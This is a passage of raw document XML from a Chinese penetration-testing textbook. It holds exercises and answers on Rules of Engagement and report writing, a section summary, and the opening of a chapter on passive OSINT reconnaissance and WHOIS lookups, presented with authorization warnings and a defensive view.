          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实务与报告结构设计，涵盖提取、理解与迁移三个层次。其中习题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.2.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为迁移任务，直接呼应第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节末尾提出的“为实验室内的靶机写一页目标清单”的练习要求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.1（提取题）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：请列出《授权范围》（RoE）至少应包含的五个核心要素，并分别解释每个要素的法律与操作意义。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：回顾本节“授权范围（RoE）”部分，不要仅罗列名称，而要说明“为什么这个要素不可或缺”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：RoE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">至少应包含：①目标范围——限定合法测试边界，防止越界导致违法；②时间窗——区分授权活动与入侵事件的时间维度；③禁止动作——保护系统可用性与数据完整性；④应急联系信息——确保意外或紧急情况下的即时沟通能力；⑤数据处理与销毁——遵守隐私法规、控制信息泄露风险（回答涵盖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个要素即满分，若补充源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP/工具清单等加分）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.2（提取题）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：渗透测试报告中为何要将“执行摘要”放在最前面？摘要应控制在什么篇幅，面向谁写作？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：思考报告的不同读者群体及其关注点差异。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：执行摘要面向非技术决策者（CXO/董事会），用业务语言回答“我们有多安全、最大风险是什么、下一步做什么”。它必须放在报告最前面，因为决策者通常只阅读摘要部分。长度控制在一至两页。若先呈现技术细节，非技术读者无法快速获取风险评估结论，导致决策延迟或沟通失败。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.3（迁移任务——为某靶场写一页</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">RoE）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：基于你在第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章搭建的隔离实验室（Kali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + Metasploitable2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + host-only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络），撰写一份一页《授权范围（RoE）》模板。要求包含目标范围、时间窗、禁止动作、应急联系信息（可使用虚构姓名与电话）、测试源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与数据处理方式。格式可自由排版，但必须覆盖本节所列的全部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">核心要素。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将你的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">虚拟机</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;LAB_SUBNET&gt;.10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，用占位符）作为源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP。目标范围限定为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP。禁止动作中加入“禁止对宿主机或网关执行任何扫描”。时间窗自设</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 24 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小时内。应急联系人虚构即可。数据销毁方式可以写“测试结束后删除所有临时文件与截图”。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="67"/>
    <w:bookmarkStart w:id="68" w:name="小结-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节将第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节确立的方法论骨架转化为具体的法律与交付实务。RoE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是渗透测试的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">法律授权文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，其核心要素包括目标范围、时间窗、禁止动作、应急联系信息与数据处理条款。书面授权是区分合法测试与违法入侵的唯一法律证据。渗透测试报告应包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">执行摘要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（面向决策者）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">技术细节与漏洞发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（带有定性风险评级，不编造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分值）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">修复建议矩阵</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">方法论与工具声明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。报告既是交付物也是法律文件。Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与网络命令的安全复习聚焦于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">诊断、日志分析、权限审计与抓包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，底层协议与系统原理均已在《从位到物联》中讲授，此处仅做攻防场景的直接应用，为后续卷次的侦察与利用实操奠定基础。攻防对称贯穿本节：RoE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为红队划定法律边界，同时蓝队可据此配置白名单与越界告警；报告的每一个漏洞发现都为蓝队提供检测规则改进与修复验证的输入，与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">生命周期中“报告→防御改进”的闭环相呼应。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="68"/>
    <w:bookmarkEnd w:id="69"/>
    <w:bookmarkEnd w:id="70"/>
    <w:bookmarkStart w:id="146" w:name="卷二-侦察与网络攻防第-47-章"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">卷二</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">侦察与网络攻防（第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4–7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="72" w:name="信息收集被动-osint-与主动侦察"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信息收集:被动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OSINT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与主动侦察</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="71" w:name="被动侦察与-osint从公开信息拼图"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被动侦察与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">OSINT:从公开信息拼图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框：本节将频繁使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS、IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">路由、TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态机等网络基础概念。读者需已掌握《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 26 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">域名系统与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">路由基础）和第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 27 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">三次握手与状态机）的核心内容。此外，建议回顾本书第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（靶场搭建）和第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（RoE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">交战规则），确保实验环境与授权边界已就绪。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框：本节中所有命令与工具演示均严格限定在读者自建的隔离实验环境中，或经过明确书面授权的目标系统（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HackTheBox/TryHackMe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提供的目标靶机，或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">官方镜像）上进行。实验网络必须与生产网络及公网物理隔离。即使是被动侦察，也应在授权范围内进行：对未经授权的第三方</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WHOIS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询可能违反服务条款；大规模搜索引擎爬取可能触发反滥用机制。未经授权收集、分析、存储他人资产信息，在多数司法管辖区可能构成违法或违规行为。请读者严格遵守所在组织的规则及当地法律法规。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="71"/>
    <w:bookmarkEnd w:id="72"/>
    <w:bookmarkStart w:id="73" w:name="原理直觉不敲门先观察"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原理直觉：不敲门，先观察</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者希望获取目标组织尽可能多的资产信息，但主动扫描（如端口探测、服务识别）会在目标日志中留下痕迹，触发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IDS/IPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">告警。被动侦察（Passive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance）的核心思想是：在完全不与目标系统发生直接网络交互的前提下，从公开可用的信息源中拼凑出目标组织的数字足迹画像。这类似于侦探在嫌疑人住所周围观察灯光、信箱、垃圾桶，而不去敲门——每个被动的观察点本身都是合法的，但结合大量观察就足以勾勒出相当精确的内部情况。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从防御者视角看，理解被动侦察的方法论是构建有效暴露面管理（Attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Surface Management, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ASM）的前提。蓝队需要持续监控本组织在公开信息空间中的痕迹，判断攻击者可能看到什么，从而主动减少不必要的暴露。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="73"/>
    <w:bookmarkStart w:id="80" w:name="osint-信息源与方法体系"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OSINT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信息源与方法体系</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开源情报（OSINT,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Open Source </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Intelligence）在网络安全领域的应用，本质上是对目标组织在互联网上遗留的各类公开数据进行系统化搜集、关联与分析。这些数据源可分为以下几个核心类别。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="74" w:name="whois-与域名注册信息"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WHOIS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与域名注册信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">域名注册是组织在互联网上建立存在感的第一步，而</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WHOIS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议正是用于查询域名注册信息的公开协议。当一个组织注册域名时，必须向注册局提供注册人、管理联系人、技术联系人、注册日期、到期日期、DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器等信息。这些信息原本设计为便于网络管理员互相联系，却成为攻击者获取组织联系人邮件、电话、物理地址甚至内部命名规范的第一手资料。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WHOIS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询的基本命令为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">whois &lt;DOMAIN&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。该命令向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WHOIS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器发起查询并返回注册记录。①</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WHOIS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议本身（RFC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3912）是无状态、明文传输的，没有内置认证与授权机制，这是一个标准协议事实。②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">具体返回字段因注册商政策、隐私保护服务、GDPR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">法规实施情况而异：某些域名通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WHOIS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隐私保护服务屏蔽了真实注册人信息；而某些老域名或特定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仍可能暴露完整的联系人数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御层面，组织应采用注册商提供的隐私保护服务（WHOIS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Privacy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Protection），用注册商的代理信息替代真实联系人。GDPR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
